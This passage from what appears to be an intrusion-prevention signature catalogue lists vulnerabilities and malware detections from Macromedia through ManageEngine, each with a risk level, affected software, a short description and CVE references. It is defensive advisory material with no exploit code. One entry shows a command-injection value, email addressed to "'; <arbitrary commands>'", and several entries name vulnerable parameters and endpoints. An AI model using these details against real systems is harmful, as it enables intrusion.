About this vulnerability: A Macromedia Flash Media Server Administration Service Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Macromedia Flash Media Server
Type: Malfunction
Description: A vulnerability in Macromedia Flash Media Server Administration Service which allows remote attackers to create a denial of service condition by sending a crafted message to the server, due to an error in the way that the affected server handles malformed data.
Situation: Generic_CS-Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service
References:
CVE-2005-4216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4216
Back to top

Macromedia-Flash-Player-LoadMovie-DoS

About this vulnerability: A vulnerability in Adobe Systems Macromedia Flash Player
Risk: Low
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: Macromedia Flash player plug-in is a multi-media module/plug-in for displaying Flash content within an HTML web page. A vulnerability exists in the way Macromedia Flash Player plug-in handles an object when it attempts to load a movie. A malicious attacker could crash a vulnerable Flash Player with a specially crafted script in a web page. When a user with a vulnerable version of Macromedia Flash installed attempts to open a web page with a call to LoadMovie() that has the layer parameter set to a value other than zero and second parameter specifying a relative pathname, the browser will terminate.
Situation: File-Text_Macromedia-Flash-Player-LoadMovie-DoS
Back to top

Macromedia-JRun-Server-File-Disclosure

About this vulnerability: A vulnerability in Macromedia JRun
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Macromedia JRun 4
Type: Input Validation
Description: There is a vulnerability in the way Macromedia JRun server processes URLs. A specially crafted request for a file can bypass access restrictions on JRun. This can result in the source of the requested script file to be served rather than the intended script output. This vulnerability may be leveraged to reveal sensitive information such as account names, passwords, paths to internal resources, and so on.
Situation: HTTP_CSU-Macromedia-JRun-Server-File-Disclosure
References:
BID-11245
http://www.securityfocus.com/bid/11245
Back to top

Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Macromedia Shockwave
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Macromedia Shockwave
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in the Macromedia Shockwave ActiveX control.
Situation: HTTP_SS-Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
File-Text_Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-1403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1403
BID-22842
http://www.securityfocus.com/bid/22842
OSVDB-36005
http://www.osvdb.org/36005
Back to top

Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution

About this vulnerability: A vulnerability in Macrovision Update Service
Risk: High
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Macrovision Update Service; Macrovision FLEXnet Connect; Macrovision InstallShield
Type: Malfunction
Description: There is a vulnerability in the access control of Macrovision InstallShield Update Service ActiveX Control (isusweb.dll). The vulnerability is due to a design error related to webpage script processing. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, which potentially allows arbitrary code to be executed with the privileges of the currently logged in user.
Situation: HTTP_SS-Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
File-Text_Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
References:
CVE-2007-5660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5660
BID-26280
http://www.securityfocus.com/bid/26280
OSVDB-38347
http://www.osvdb.org/38347
Back to top

Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Macrovision InstallShield Update Service
Risk: High
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Macrovision FLEXnet Connect; Macrovision InstallShield; Macrovision Update Service
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in the Macrovision InstallShield Update Service ActiveX control implemented in isusweb.dll. The vulnerability is due to a design error while processing calls to a method of the ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page, potentially allowing arbitrary code to be injected and executed in the security context of the currently logged in user.
Situation: HTTP_SS-Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption
File-Text_Macrovision-InstallShield-Update-Service-Agent-ActiveX
References:
CVE-2008-2470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2470
BID-31235
http://www.securityfocus.com/bid/31235
Back to top

Magecart-Code-Injection

About this vulnerability: Magecart code injected into a website
Risk: Moderate
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1423-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Magecart works by operatives gaining access to websites either directly or via third-party services and injecting malicious JavaScript that steals data shoppers enter into online payment forms, typically on checkout pages.
Situation: File-Text_Magecart-Beacon-2
File-Text_Magecart-Beacon-3
File-Text_Magecart-Beacon-4
File-Text_Magecart-Beacon
Back to top

Magento-API-Unserialize-Remote-Code-Execution

About this vulnerability: A vulnerability in Magento Magento
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Magento
Type: Input Validation
Description: An object deserialization error in Magento results in a remote code execution vulnerability. The vulnerability can be exploited by sending crafted requests to the server. A successful exploit results in the attacker gaining the ability to write arbitrary files on the target host.
Situation: File-TextId_Magento-API-Unserialize-Remote-Code-Execution
File-Text_Magento-API-Unserialize-Remote-Code-Execution
References:
CVE-2016-4010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4010
Back to top

Magento-Forwarded-Parameter-Authentication-Bypass

About this vulnerability: A vulnerability in Magento
Risk: High
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: Magento
Type: Malfunction
Description: An authentication bypass vulnerability exists in the e-commerce platform Magento. The vulnerability is due to a logic error when handling a user controlled parameter in the login mechanism. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target. Successful exploitation of this vulnerability may allow the attacker to gain access to the target system.
Situation: HTTP_CSU-Magento-Forwarded-Parameter-Authentication-Bypass
References:
CVE-2015-1398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1398
OSVDB-121261
http://www.osvdb.org/121261
Back to top

Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Magento Magento
Risk: Moderate
First detected in: sgpkg-ips-893-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Magento
Type: Input Validation
Description: Insufficient validation of user input to the retrieveImage method causes a cross-site request forgery vulnerability in Magento. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the Magento process.
Situation: HTTP_CRL-Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery
Back to top

Magic-Winmail-Server-Pass-Format-String-Vuln

About this vulnerability: Magic Winmail Server PASS format string vulnerability
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Magic Winmail Server
Type: Format String
Description: A format string vulnerability exists in the handling of PASS command argument. A successful exploit could lead into remote system compromise.
Situation: POP3_Format-String-Specifiers-In-Argument-To-Pass
References:
CVE-2003-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0391
Back to top

MagnusBilling-Application-Unauthenticated-Remote-Command-Execution

About this vulnerability: An attempt to exploit a vulnerability in MagnusBilling detected
Risk: High
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Platform: Generic
Software: MagnusBilling
Type: Input Validation
Description: A vulnerability in MagnusBilling, versions 6.x and 7.x, which allows remote attackers to execute arbitrary code via the democ parameter in a request to lib/icepay/icepay.php, due to insufficient input validation.
Situation: HTTP_CSU-MagnusBilling-Application-Unauthenticated-Remote-Command-Execution
References:
CVE-2023-30258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30258
Back to top

Mahdi

About this vulnerability: Mahdi
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Mahdi is a malware that is used for cyber erpionage.
Situation: HTTP_CSU-Mahdi-Traffic
File-Text_HTML-Possible-Mahdi-Traffic
Back to top

Mail-Manage-EX-Php-Include-Exploit

About this vulnerability: Mail Manage EX PHP Include Exploit
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mail Manage EX
Type: Input Validation
Description: There exists a vulnerability in Mail Manage EX. A remote attacker can inject a malicious url for the Settings parameter which can lead to system compromise.
Situation: HTTP_CRL-Mail-Manage-EX-Php-Include-Exploit
Back to top

MailCarrier-Buffer-Overflow

About this vulnerability: A MailCarrier Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailCarrier
Type: Buffer Overflow
Description: A buffer overflow vulnerability in MailCarrier, version 2.51, which allows remote attackers to execute arbitrary code via a long EHLO and HELO command.
Situation: SMTP_CS-MailCarrier-Buffer-Overflow
References:
CVE-2004-1638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1638
BID-11535
http://www.securityfocus.com/bid/11535
OSVDB-11174
http://www.osvdb.org/11174
Back to top

Mailcleaner-Remote-Code-Execution

About this vulnerability: A vulnerability in Mailcleaner
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mailcleaner
Type: Input Validation
Description: A vulnerability in Mailcleaner which allows remote attackers to execute arbitrary operating system commands due to the insufficient validation of input to /admin/managetracing/search/search.
Situation: HTTP_CSR-Mailcleaner-Remote-Code-Execution
References:
CVE-2018-20323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20323
Back to top

MailEnable-HTTP-Authorization-Header-Buffer-Overflow

About this vulnerability: A vulnerability in MailEnable MailEnable Enterprise
Risk: High
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MailEnable
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way MailEnable processes the HTTPMail protocol. This issue is caused by insufficient boundary checking when data is copied into a fixed size buffer. This vulnerability can be exploited to execute arbitrary code on the target system with privileges of the HTTPMail service process.
Situation: HTTP_CSH-MailEnable-HTTP-Authorization-Header-Buffer-Overflow
References:
CVE-2005-1348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1348
BID-13350
http://www.securityfocus.com/bid/13350
OSVDB-15737
http://www.osvdb.org/15737
Back to top

MailEnable-Professional-1.54-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in MailEnable Professional 1.54
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in MailEnable Professional 1.54 which allows a remote attacker to execute arbitrary code via a long mailbox name.
Situation: IMAP_CS-MailEnable-Professional-1.54-Buffer-Overflow
References:
CVE-2005-2278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2278
BID-14243
http://www.securityfocus.com/bid/14243
OSVDB-17844
http://www.osvdb.org/17844
Back to top

MailEnable-SMTP-Mailto-Format-String

About this vulnerability: Format string vulnerability in MailEnable Server
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Format String
Description: MailEnable SMTP and POP3 servers have a format string vulnerability in the mailto header handling. A remote attacker could send an SMTP message that contains a malicious mailto header to cause a denial of service and/or to execute arbitrary code on the server.
Situation: E-Mail_HCS-MailEnable-SMTP-Mailto-Format-String
References:
CVE-2004-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0804
BID-12833
http://www.securityfocus.com/bid/12833
OSVDB-14858
http://www.osvdb.org/14858
Back to top

MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow

About this vulnerability: A vulnerability in MailEnable MailEnable
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in MailEnable server products. The flaw is caused by insufficient validation checks when processing the signature field of NTLM Type1 messages within the SMTP service. A remote unauthenticated attacker may successfully exploit this vulnerability to execute arbitrary code on the vulnerable machine. In an attack case where code injection is not successful, the affected SMTP service will terminate upon processing of the malicious message. If the SMTP service is not configured to restart automatically, the services will be unavailable until the process is restarted manually. In a more sophisticated attack, where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the SYSTEM account.
Situation: SMTP_MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow
Back to top

MailEnable-W3C-Logging-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in MailEnable Enterprise 1.1 and Professional 1.6
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the W3C logging for MailEnable Enterprise 1.1 and Professional 1.6 which allows a remote attacker to execute arbitrary code.
Situation: IMAP_CS-MailEnable-W3C-Logging-Buffer-Overflow
References:
CVE-2005-3155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155
BID-15006
http://www.securityfocus.com/bid/15006
OSVDB-19842
http://www.osvdb.org/19842
Back to top

Mailnews-Cgi-System-Compromise

About this vulnerability: Mailnews.cgi System Compromise
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Claude Reuter mailnews.cgi
Type: Input Validation
Description: The mailnews.cgi script can be exploited to run arbitrary commands by sending e-mail to '; <arbitrary commands>'.
References:
CVE-2001-0271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0271
BID-2391
http://www.securityfocus.com/bid/2391
Back to top

Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in MailStore Software MailStore Server
Risk: Moderate
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MailStore Server
Type: Input Validation
Description: Insufficient validation of user input results in a cross-site scripting vulnerability in MailStore Software MailStore Server. A successful exploitation allows an attacker to run arbitrary code on a user's web browser.
Situation: HTTP_CRL-Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting
Back to top

MajorDoMo-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in MajorDoMo detected
Risk: High
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Platform: Linux
Software: MajorDoMo
Type: Input Validation
Description: A vulnerability in MajorDoMo, versions before 0662e5e, which allows remote attackers to bypass input validation by base64 encoding rtsp: or /dev in the url parameter, enebling the execution of arbitrary system commands on the target server through the trasnport parameter.
Situation: HTTP_CSU-MajorDoMo-Command-Injection
References:
CVE-2023-50917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50917
Back to top

Majordomo2-Directory-Traversal

About this vulnerability: A Majordomo2 Directory Traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1638-5242
Platform: Linux
Software: Majordomo2
Type: Directory Traversal
Description: A vulnerability in Majordomo2, versions before 20110131, which allows remote attackers to read arbitrary files via a dot dot sequence directory traversal using a crafted email or cgi-bin/mj_wwwusr in the web interface.
References:
CVE-2011-0049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049
OSVDB-70762
http://www.osvdb.org/70762
Back to top

Mako-Server-Remote-Command-Injection

About this vulnerability: A Mako Server Remote Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mako Server
Type: Input Validation
Description: A vulnerability in Mako Server, versions 2.5 and 2.6, which allows remote attackers to execute arbitrary code by saving the user input via a POST to save.lsp in the Mako Server tutorial page, and executing the input with a GET request to manage.lsp.
Situation: HTTP_CRL-Mako-Server-Remote-Command-Injection
Back to top

Malicious-Ico-File-Used-By-Trojans

About this vulnerability: A malicious .ico file used by trojanized 3CX VOIP application detected
Risk: High
First detected in: sgpkg-ips-1574-5242
Last changed: sgpkg-ips-1574-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Trojanized 3CX VOIP applicationicon utilizes icon files hosted on GitHub that contain Base64 encoded strings appended to the end of the images.
Situation: File-Binary_Malicious-Ico-File-Used-By-Trojans
Back to top

Malicious-Internet-Shortcut-File

About this vulnerability: A possibly malicious internet shortcut file was detected
Risk: Moderate
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1802-5242
Platform: Windows
Software: <os>
Type: Script Injection
Description: Malicious internet shortcut files are usually delivered via email in compressed archives. These internet shortcut files are used to download malicious payload to a system, if the receiver of an email executes the attachment.
Situation: File-Text_Suspicious-Internet-Shortcut-File
File-Text_Malicious-Internet-Shortcut-File
File-TextId_Malicious-Internet-Shortcut-File
File-TextId_Suspicious-Internet-Shortcut-File
Back to top

Malicious-Java-Applet-Reference

About this vulnerability: Attempt to download a malicious Java Applet
Risk: High
First detected in: sgpkg-ips-192-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Malfunction
Description: There are various widely used attacks using vulnerablities in Sun Java. These attacks are embedded into web pages as Java applets and may allow arbitary command execution in the context of the local user.
Situation: HTTP_SS-Malicious-Java-Applet-Reference
File-Text_Malicious-Java-Applet-Reference
Back to top

Malicious-JavaScript-In-PDF

About this vulnerability: A PDF file with malicious JavaScript detected
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A malicious piece of JavaScript inside PDF was seen.
Situation: File-PDF_Malicious-JavaScript-In-PDF-2
File-PDF_Malicious-JavaScript-In-PDF
Back to top

Malicious-KiXtart-Script-Infection-Traffic

About this vulnerability: Malicious KiXtart Script infection traffic
Risk: High
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Malicious KiXtart script infection traffic was detected. This type of script has been observed downloading MirrorBlast malware.
Situation: HTTP_CSU-Malicious-KiXtart-Script-Infection-Traffic
Back to top

Malicious-Obfuscation-JavaScript-VBScript-HTML

About this vulnerability: Malicious obfuscated JavaScript and VBScript in HTML page detected
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1423-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Malicious obfuscated JavaScript and VBScript in HTML page (leading to download of malicious payload) was detected.
Situation: File-Text_Malicious-Obfuscated-JavaScript-VBScript-Detected
Back to top

Malicious-Obfuscation-Reversed-PowerShell

About this vulnerability: Malicious obfuscated script with reversed PowerShell keywords detected
Risk: High
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1423-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Malicious obfuscated script containing reversed PowerShell keywords was detected.
Situation: File-Text_Malicious-Obfuscated-Reversed-PowerShell-Detected
Back to top

Malicious-Site-Using-ClickFix-Technique

About this vulnerability: A malicious ClickFix website detected
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: A malicious site that uses the ClickFix tactic usually shows fake browser alerts that warn the user that the webpage or document cannot be displayed correctly by the browser until they click the "Fix It" button and follow the outlined steps. This results in the user unknowningly copying and executing malicious code that installs malware. This fingerprint detects such malicious sites.
Situation: File-Text_Information-Stealer-Using-Fake-Browser-Dialogs
Back to top

Malicious-VBScript-Execution

About this vulnerability: Malicious VBScript detected
Risk: High
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Malicious VBScript has been detected. Malicious VBScript files are usually used as downloaders for a final malware.
Situation: Shared_Malicious-VBScript-Execution
File-Text_Malicious-VBScript-Execution
File-Text_Obfuscated-VBScript-Inside-JavaScript
Back to top

Malicious_Download_Redirect

About this vulnerability: Malicious redirection was detected
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: A malicious redirection was detected. Malicious redirections usually originate from legitimate web sites that are compromised.
Situation: File-Text_Malicious_Download_Redirect
Back to top

Malicious_Redirection_Detected

About this vulnerability: Malicious redirection was detected
Risk: High
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: A malicious redirection was detected. Malicious redirections usually originate from legitimate web sites that are compromised.
Situation: File-Text_Malicious_Redirection_Detected
File-Text_Malicious_Redirection_Detected-5
File-Text_Malicious_Redirection_Detected-4
File-Text_Malicious_Redirection_Detected-3
File-Text_Malicious_Redirection_Detected-2
Back to top

Maltrail-Unauthenticated-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in Maltrail detected
Risk: High
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Platform: Unix;Linux
Software: Maltrail
Type: Input Validation
Description: A vulnerability in Maltrail, versions before 0.54, which allows remote attackers to execute arbitrary code through the username parameter, due to insufficient input validation.
Situation: HTTP_CRL-Maltrail-Unauthenticated-Command-Injection
Back to top

Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution

About this vulnerability: A vulnerability in Malwarebytes Anti-Malware
Risk: Moderate
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Malwarebytes Anti-Malware
Type: Input Validation
Description: There has been reported a remote code execution in Malwarebytes Anti-Malware. Exploitation of this vulnerability requires opening a malicious web page. Successful exploitation leads in arbitrary code execution.
Situation: HTTP_SHS-Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
File-Text_Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
References:
CVE-2019-6739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6739
Back to top

Mambo-Globals-Php-MosConfig-Live-Site-Compromise

About this vulnerability: Mambo Globals.php mosConfig_live_site variable command execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mambo Site Server; Joomla
Type: Malfunction
Description: There are several remote command execution vulnerabilities in various versions of Mambo Site Server, Joomla and third party extensions of them. These vulnerabilities are due to insufficient input validation of mosConfig_live_site global variable, which may allow code execution from a remote location.
Situation: HTTP_CSU-Mambo-Globals-Php-MosConfig-Live-Site-Compromise
Back to top

Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE

About this vulnerability: A vulnerability in Manage Engine Exchange Reporter Plus
Risk: High
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Exchange Reporter Plus
Type: Code Injection
Description: A vulnerability in ManageEngine Exchange Reporter Plus, versions 5310 and before, which allows remote attackers to execute arbitrary code through the execution of bcp.exe inside the ADSHACluster servlet.
Situation: HTTP_CRL-Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE
Back to top

Manageengine-Adselfservice-Plus-Custom-Script-Execution

About this vulnerability: A vulnerability in ManageEngine ADSelfService Plus.
Risk: High
First detected in: sgpkg-ips-1461-5242
Last changed: sgpkg-ips-1461-5242
Platform: Windows
Software: Zoho Corporation ManageEngine ADSelfService Plus
Type: Insecure Configuration
Description: A vulnerability in Zoho Corporation ManageEngine ADSelfServicePlus, build prior to 6122, which allows remote attackers to execute arbitrary commands via the "custom script" feature.
Situation: HTTP_CS-Manageengine-Adselfservice-Plus-Custom-Script-Execution
References:
CVE-2022-28810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28810
Back to top

Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: High
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: An SQL injection vulnerability exists in ManageEngine Applications Manager. This vulnerability is due to insufficient validation of the groupId parameter when processing requests using the getMGList method of the CommonAPIUtil class. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation: HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection
Back to top

Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: Some requests to the server can be used to inject SQL.
Situation: HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-Tohaid-SQL-Injection
Back to top

Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: There is an SQL injection vulnerability in ManageEngine Applications Manager, which can be exploited using a crafted HTTP request.
Situation: HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-Haid-SQL-Injection
Back to top

Manageengine-Applications-Manager-Commonapiutil-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: There exists an SQL injection vulnerability in ManageEngine Application Manager. A remote attacker can use this to inject and execute arbitrary SQL code on the target system.
Situation: HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-SQL-Injection
Back to top

Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: An SQL injection vulnerability exists in ManageEngine Applications Manager. This vulnerability is due to insufficient validation of the haid parameter when processing requests using the SyncMonitors method of the CommonAPIUtil class. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation: HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection
Back to top

Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection

About this vulnerability: A vulnerability in ManageEngine Applications Manager
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine Applications Manager
Type: Input Validation
Description: Insufficient validation of the config_id parameter in requests causes an SQL injection vulnerability in ManageEngine Applications Manager. A successful exploitation allows an attacker to execute arbitrary SQL statements with full privileges.
Situation: HTTP_CRL-Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection
References:
CVE-2016-9488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9488
Back to top

Manageengine-Applications-Manager-Remote-Code-Execution

About this vulnerability: A ManageEngine Applications Manager Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1731-5242
Platform: Windows
Software: ManageEngine Applications Manager
Type: Input Validation
Description: A vulnerability in ManageEngine Applications Manager, versions before 13.6 (build 13640), which allows remote attackers to execute arbitrary code via the testCredential.do endpoint, due to the lack of username/password validation.
Situation: HTTP_CRL-Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection
References:
CVE-2018-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7890
Back to top

Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass

About this vulnerability: A vulnerability in ManageEngine DesktopCentral
Risk: Moderate
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ManageEngine DesktopCentral
Type: Malfunction
Description: A policy bypass vulnerability exists in ManageEngine Desktop Central. The vulnerability is due to lack of authentication and insufficient input validation of the parameters sent to the Dcpluginservelet page when processing HTTP(S) requests. A remote unauthenticated attacker can exploit this vulnerability by sending an specially crafted request to the target server. In a successful attack scenario, the attacker can create an administrator account.
Situation: HTTP_CRL-Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass
References:
CVE-2014-7862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7862
OSVDB-116554
http://www.osvdb.org/116554
Back to top

Manageengine-Desktop-Central-Java-Deserialization

About this vulnerability: A vulnerability in ManageEngine Desktop Central
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Zoho Corporation ManageEngine Desktop Central
Type: Input Validation
Description: There exists a vulnerability in ManageEngine Desktop Central, versions before 10.0.474, which allows remote attackers to execute arbitrary code, due to the lack of user input validation in the getChartImage() method from the FileStorage class.
Situation: HTTP_CRL-Manageengine-Desktop-Central-Java-Deserialization
References:
CVE-2020-10189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
Back to top

Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal

About this vulnerability: A vulnerability in ManageEngine DesktopCentral
Risk: High
